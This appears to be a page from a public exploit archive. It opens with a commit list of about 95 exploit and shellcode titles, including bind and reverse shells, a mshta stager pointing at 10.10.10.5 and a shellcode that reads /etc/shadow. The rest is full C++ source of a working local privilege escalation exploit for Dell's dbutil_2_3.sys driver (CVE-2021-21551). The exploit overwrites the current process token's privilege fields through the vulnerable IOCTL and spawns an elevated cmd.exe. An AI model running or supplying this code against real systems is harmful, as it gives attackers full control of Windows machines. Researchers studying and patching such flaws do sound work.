de260aeac6
95 changes to exploits/shellcodes Product Key Explorer 4.2.7 - 'multiple' Denial of Service (PoC) Managed Switch Port Mapping Tool 2.85.2 - Denial of Service (PoC) AgataSoft PingMaster Pro 2.1 - Denial of Service (PoC) Nsauditor 3.2.2.0 - 'Event Description' Denial of Service (PoC) WordPress Plugin WPGraphQL 1.3.5 - Denial of Service Sandboxie 5.49.7 - Denial of Service (PoC) WebSSH for iOS 14.16.10 - 'mashREPL' Denial of Service (PoC) iDailyDiary 4.30 - Denial of Service (PoC) RarmaRadio 2.72.8 - Denial of Service (PoC) DupTerminator 1.4.5639.37199 - Denial of Service (PoC) Color Notes 1.4 - Denial of Service (PoC) Macaron Notes great notebook 5.5 - Denial of Service (PoC) My Notes Safe 5.3 - Denial of Service (PoC) n+otes 1.6.2 - Denial of Service (PoC) Telegram Desktop 2.9.2 - Denial of Service (PoC) Mini-XML 3.2 - Heap Overflow Solaris 10 (Intel) - 'dtprintinfo' Local Privilege Escalation (2) Solaris 10 (Intel) - 'dtprintinfo' Local Privilege Escalation (3) Solaris 10 (SPARC) - 'dtprintinfo' Local Privilege Escalation (1) Solaris 10 (SPARC) - 'dtprintinfo' Local Privilege Escalation (2) MariaDB 10.2 - 'wsrep_provider' OS Command Execution Microsoft Internet Explorer 11 and WPAD service 'Jscript.dll' - Use-After-Free Visual Studio Code 1.47.1 - Denial of Service (PoC) DELL dbutil_2_3.sys 2.3 - Arbitrary Write to Local Privilege Escalation (LPE) MySQL User-Defined (Linux) x32 / x86_64 - 'sys_exec' Local Privilege Escalation (2) Cmder Console Emulator 1.3.18 - 'Cmder.exe' Denial of Service (PoC) GNU Wget < 1.18 - Arbitrary File Upload (2) WebCTRL OEM 6.5 - 'locale' Reflected Cross-Site Scripting (XSS) E-Learning System 1.0 - Authentication Bypass PEEL Shopping 9.3.0 - 'Comments' Persistent Cross-Site Scripting GetSimple CMS 3.3.16 - Persistent Cross-Site Scripting EgavilanMedia User Registration & Login System with Admin Panel 1.0 - Persistent Cross-Site Scripting Selea Targa 512 IP OCR-ANPR Camera - Stream Disclosure (Unauthenticated) Library System 1.0 - Authentication Bypass Web Based Quiz System 1.0 - 'name' Persistent Cross-Site Scripting Dolibarr ERP 11.0.4 - File Upload Restrictions Bypass (Authenticated RCE) GetSimple CMS My SMTP Contact Plugin 1.1.1 - Cross-Site Request Forgery GravCMS 1.10.7 - Unauthenticated Arbitrary File Write (Metasploit) Umbraco v8.14.1 - 'baseUrl' SSRF Cacti 1.2.12 - 'filter' SQL Injection GetSimple CMS Custom JS 0.1 - Cross-Site Request Forgery Internship Portal Management System 1.0 - Remote Code Execution(Unauthenticated) Markdown Explorer 0.1.1 - Persistent Cross-Site Scripting Xmind 2020 - Persistent Cross-Site Scripting Tagstoo 2.0.1 - Persistent Cross-Site Scripting SnipCommand 0.1.0 - Persistent Cross-Site Scripting Moeditor 0.2.0 - Persistent Cross-Site Scripting Marky 0.0.1 - Persistent Cross-Site Scripting StudyMD 0.3.2 - Persistent Cross-Site Scripting Freeter 1.2.1 - Persistent Cross-Site Scripting Markright 1.0 - Persistent Cross-Site Scripting Markdownify 1.2.0 - Persistent Cross-Site Scripting Anote 1.0 - Persistent Cross-Site Scripting Subrion CMS 4.2.1 - Arbitrary File Upload Printable Staff ID Card Creator System 1.0 - 'email' SQL Injection Schlix CMS 2.2.6-6 - Arbitary File Upload (Authenticated) Selenium 3.141.59 - Remote Code Execution (Firefox/geckodriver) CHIYU IoT Devices - Denial of Service (DoS) Zenario CMS 8.8.52729 - 'cID' SQL injection (Authenticated) TextPattern CMS 4.8.7 - Remote Command Execution (Authenticated) WordPress Plugin Anti-Malware Security and Bruteforce Firewall 4.20.59 - Directory Traversal Atlassian Jira Server Data Center 8.16.0 - Reflected Cross-Site Scripting (XSS) Scratch Desktop 3.17 - Remote Code Execution Church Management System 1.0 - Arbitrary File Upload (Authenticated) Phone Shop Sales Managements System 1.0 - Arbitrary File Upload Zoo Management System 1.0 - 'Multiple' Persistent Cross-Site-Scripting (XSS) WordPress Plugin Current Book 1.0.1 - 'Book Title' Persistent Cross-Site Scripting ForgeRock Access Manager 14.6.3 - Remote Code Execution (RCE) (Unauthenticated) KevinLAB BEMS 1.0 - Authentication Bypass Event Registration System with QR Code 1.0 - Authentication Bypass CloverDX 5.9.0 - Cross-Site Request Forgery (CSRF) Panasonic Sanyo CCTV Network Camera 2.03-0x - Cross-Site Request Forgery (Change Password) qdPM 9.2 - Password Exposure (Unauthenticated) ApacheOfBiz 17.12.01 - Remote Command Execution (RCE) Movable Type 7 r.5002 - XMLRPC API OS Command Injection (Metasploit) GeoVision Geowebserver 5.3.3 - Local FIle Inclusion Simple Phone Book 1.0 - 'Username' SQL Injection (Unauthenticated) Umbraco CMS 8.9.1 - Directory Traversal Traffic Offense Management System 1.0 - Remote Code Execution (RCE) (Unauthenticated) Dolibarr ERP 14.0.1 - Privilege Escalation Compro Technology IP Camera - 'killps.cgi' Denial of Service (DoS) Drupal Module MiniorangeSAML 8.x-2.22 - Privilege escalation Phpwcms 1.9.30 - Arbitrary File Upload Windows/x86 - Download File (http://10.10.10.5:8080/2NWyfQ9T.hta) Via mshta + Execute + Stager Shellcode (143 bytes) Linux/x64 - Bind_tcp (0.0.0.0:4444) + Password (12345678) + Shell (/bin/sh) Shellcode (142 bytes) Linux/x64 - execve _cat /etc/shadow_ Shellcode (66 bytes) Windows/x86 - Add User Alfred to Administrators/Remote Desktop Users Group Shellcode (240 bytes) Windows/x64 - Dynamic Null-Free WinExec PopCalc Shellcode (205 Bytes) Windows/x64 - Dynamic NoNull Add RDP Admin (BOKU:SP3C1ALM0V3) Shellcode (387 Bytes) Linux/x86 - setreuid(0) + execve(_/bin/sh_) Shellcode (29 bytes) Linux/x86 - Bind (User Specified Port) Shell (/bin/sh) Shellcode (102 bytes) Linux/x86 - Reverse (dynamic IP and port/TCP) Shell (/bin/sh) Shellcode (86 bytes) Linux/x86 - Egghunter Reverse TCP Shell dynamic IP and port Shellcode Windows/x86 - WinExec PopCalc PEB & Export Directory Table NullFree Dynamic Shellcode (178 bytes) Windows/x86 - MessageBoxA PEB & Export Address Table NullFree/Dynamic Shellcode (230 bytes)
219 lines
No EOL
6.6 KiB
C++
219 lines
No EOL
6.6 KiB
C++
# Exploit Title: DELL dbutil_2_3.sys 2.3 - Arbitrary Write to Local Privilege Escalation (LPE)
|
|
# Date: 10/05/2021
|
|
# Exploit Author: Paolo Stagno aka VoidSec
|
|
# Version: <= 2.3
|
|
# CVE: CVE-2021-21551
|
|
# Tested on: Windows 10 Pro x64 v.1903 Build 18362.30
|
|
# Blog: https://voidsec.com/reverse-engineering-and-exploiting-dell-cve-2021-21551/
|
|
|
|
#include <iostream>
|
|
#include <windows.h>
|
|
#include <winternl.h>
|
|
#include <tlhelp32.h>
|
|
#include <algorithm>
|
|
|
|
#define IOCTL_CODE 0x9B0C1EC8 // IOCTL_CODE value, used to reach the vulnerable function (taken from IDA)
|
|
#define SystemHandleInformation 0x10
|
|
#define SystemHandleInformationSize 1024 * 1024 * 2
|
|
|
|
// define the buffer structure which will be sent to the vulnerable driver
|
|
typedef struct Exploit
|
|
{
|
|
uint64_t Field1; // "padding" can be anything
|
|
void* Field2; // where to write
|
|
uint64_t Field3; // must be 0
|
|
uint64_t Field4; // value to write
|
|
};
|
|
|
|
typedef struct outBuffer
|
|
{
|
|
uint64_t Field1;
|
|
uint64_t Field2;
|
|
uint64_t Field3;
|
|
uint64_t Field4;
|
|
};
|
|
|
|
// define a pointer to the native function 'NtQuerySystemInformation'
|
|
using pNtQuerySystemInformation = NTSTATUS(WINAPI*)(
|
|
ULONG SystemInformationClass,
|
|
PVOID SystemInformation,
|
|
ULONG SystemInformationLength,
|
|
PULONG ReturnLength);
|
|
|
|
// define the SYSTEM_HANDLE_TABLE_ENTRY_INFO structure
|
|
typedef struct _SYSTEM_HANDLE_TABLE_ENTRY_INFO
|
|
{
|
|
USHORT UniqueProcessId;
|
|
USHORT CreatorBackTraceIndex;
|
|
UCHAR ObjectTypeIndex;
|
|
UCHAR HandleAttributes;
|
|
USHORT HandleValue;
|
|
PVOID Object;
|
|
ULONG GrantedAccess;
|
|
} SYSTEM_HANDLE_TABLE_ENTRY_INFO, * PSYSTEM_HANDLE_TABLE_ENTRY_INFO;
|
|
|
|
// define the SYSTEM_HANDLE_INFORMATION structure
|
|
typedef struct _SYSTEM_HANDLE_INFORMATION
|
|
{
|
|
ULONG NumberOfHandles;
|
|
SYSTEM_HANDLE_TABLE_ENTRY_INFO Handles[1];
|
|
} SYSTEM_HANDLE_INFORMATION, * PSYSTEM_HANDLE_INFORMATION;
|
|
|
|
int main(int argc, char** argv)
|
|
{
|
|
|
|
// open a handle to the device exposed by the driver - symlink is \\.\\DBUtil_2_3
|
|
HANDLE device = ::CreateFileW(
|
|
L"\\\\.\\DBUtil_2_3",
|
|
GENERIC_WRITE | GENERIC_READ,
|
|
NULL,
|
|
nullptr,
|
|
OPEN_EXISTING,
|
|
NULL,
|
|
NULL);
|
|
if (device == INVALID_HANDLE_VALUE)
|
|
{
|
|
std::cout << "[!] Couldn't open handle to DBUtil_2_3 driver. Error code: " << ::GetLastError() << std::endl;
|
|
return -1;
|
|
}
|
|
std::cout << "[+] Opened a handle to DBUtil_2_3 driver!\n";
|
|
|
|
// resolve the address of NtQuerySystemInformation and assign it to a function pointer
|
|
pNtQuerySystemInformation NtQuerySystemInformation = (pNtQuerySystemInformation)::GetProcAddress(::LoadLibraryW(L"ntdll"), "NtQuerySystemInformation");
|
|
if (!NtQuerySystemInformation)
|
|
{
|
|
std::cout << "[!] Couldn't resolve NtQuerySystemInformation API. Error code: " << ::GetLastError() << std::endl;
|
|
return -1;
|
|
}
|
|
std::cout << "[+] Resolved NtQuerySystemInformation!\n";
|
|
|
|
// open the current process token - it will be used to retrieve its kernelspace address later
|
|
HANDLE currentProcess = ::GetCurrentProcess();
|
|
HANDLE currentToken = NULL;
|
|
bool success = ::OpenProcessToken(currentProcess, TOKEN_ALL_ACCESS, ¤tToken);
|
|
if (!success)
|
|
{
|
|
std::cout << "[!] Couldn't open handle to the current process token. Error code: " << ::GetLastError() << std::endl;
|
|
return -1;
|
|
}
|
|
std::cout << "[+] Opened a handle to the current process token!\n";
|
|
|
|
// allocate space in the heap for the handle table information which will be filled by the call to 'NtQuerySystemInformation' API
|
|
PSYSTEM_HANDLE_INFORMATION handleTableInformation = (PSYSTEM_HANDLE_INFORMATION)HeapAlloc(::GetProcessHeap(), HEAP_ZERO_MEMORY, SystemHandleInformationSize);
|
|
|
|
// call NtQuerySystemInformation and fill the handleTableInformation structure
|
|
ULONG returnLength = 0;
|
|
NtQuerySystemInformation(SystemHandleInformation, handleTableInformation, SystemHandleInformationSize, &returnLength);
|
|
|
|
uint64_t tokenAddress = 0;
|
|
// iterate over the system's handle table and look for the handles beloging to our process
|
|
for (int i = 0; i < handleTableInformation->NumberOfHandles; i++)
|
|
{
|
|
SYSTEM_HANDLE_TABLE_ENTRY_INFO handleInfo = (SYSTEM_HANDLE_TABLE_ENTRY_INFO)handleTableInformation->Handles[i];
|
|
// if it finds our process and the handle matches the current token handle we already opened, print it
|
|
if (handleInfo.UniqueProcessId == ::GetCurrentProcessId() && handleInfo.HandleValue == (USHORT)currentToken)
|
|
{
|
|
tokenAddress = (uint64_t)handleInfo.Object;
|
|
std::cout << "[+] Current token address in kernelspace is at: 0x" << std::hex << tokenAddress << std::endl;
|
|
}
|
|
}
|
|
|
|
outBuffer buffer =
|
|
{
|
|
0,
|
|
0,
|
|
0,
|
|
0
|
|
};
|
|
|
|
/*
|
|
dt nt!_SEP_TOKEN_PRIVILEGES
|
|
+0x000 Present : Uint8B
|
|
+0x008 Enabled : Uint8B
|
|
+0x010 EnabledByDefault : Uint8B
|
|
|
|
We've added +1 to the offsets to ensure that the low bytes part are 0xff.
|
|
*/
|
|
|
|
// overwrite the _SEP_TOKEN_PRIVILEGES "Present" field in the current process token
|
|
Exploit exploit =
|
|
{
|
|
0x4141414142424242,
|
|
(void*)(tokenAddress + 0x40),
|
|
0x0000000000000000,
|
|
0xffffffffffffffff
|
|
};
|
|
|
|
// overwrite the _SEP_TOKEN_PRIVILEGES "Enabled" field in the current process token
|
|
Exploit exploit2 =
|
|
{
|
|
0x4141414142424242,
|
|
(void*)(tokenAddress + 0x48),
|
|
0x0000000000000000,
|
|
0xffffffffffffffff
|
|
};
|
|
|
|
// overwrite the _SEP_TOKEN_PRIVILEGES "EnabledByDefault" field in the current process token
|
|
Exploit exploit3 =
|
|
{
|
|
0x4141414142424242,
|
|
(void*)(tokenAddress + 0x50),
|
|
0x0000000000000000,
|
|
0xffffffffffffffff
|
|
};
|
|
|
|
DWORD bytesReturned = 0;
|
|
success = DeviceIoControl(
|
|
device,
|
|
IOCTL_CODE,
|
|
&exploit,
|
|
sizeof(exploit),
|
|
&buffer,
|
|
sizeof(buffer),
|
|
&bytesReturned,
|
|
nullptr);
|
|
if (!success)
|
|
{
|
|
std::cout << "[!] Couldn't overwrite current token 'Present' field. Error code: " << ::GetLastError() << std::endl;
|
|
return -1;
|
|
}
|
|
std::cout << "[+] Successfully overwritten current token 'Present' field!\n";
|
|
|
|
success = DeviceIoControl(
|
|
device,
|
|
IOCTL_CODE,
|
|
&exploit2,
|
|
sizeof(exploit2),
|
|
&buffer,
|
|
sizeof(buffer),
|
|
&bytesReturned,
|
|
nullptr);
|
|
if (!success)
|
|
{
|
|
std::cout << "[!] Couldn't overwrite current token 'Enabled' field. Error code: " << ::GetLastError() << std::endl;
|
|
return -1;
|
|
}
|
|
std::cout << "[+] Successfully overwritten current token 'Enabled' field!\n";
|
|
|
|
success = DeviceIoControl(
|
|
device,
|
|
IOCTL_CODE,
|
|
&exploit3,
|
|
sizeof(exploit3),
|
|
&buffer,
|
|
sizeof(buffer),
|
|
&bytesReturned,
|
|
nullptr);
|
|
if (!success)
|
|
{
|
|
std::cout << "[!] Couldn't overwrite current token 'EnabledByDefault' field. Error code:" << ::GetLastError() << std::endl;
|
|
return -1;
|
|
}
|
|
std::cout << "[+] Successfully overwritten current token 'EnabledByDefault' field!\n";
|
|
std::cout << "[+] Token privileges successfully overwritten!\n";
|
|
std::cout << "[+] Spawning a new shell with full privileges!\n";
|
|
|
|
system("cmd.exe");
|
|
|
|
return 0;
|
|
} |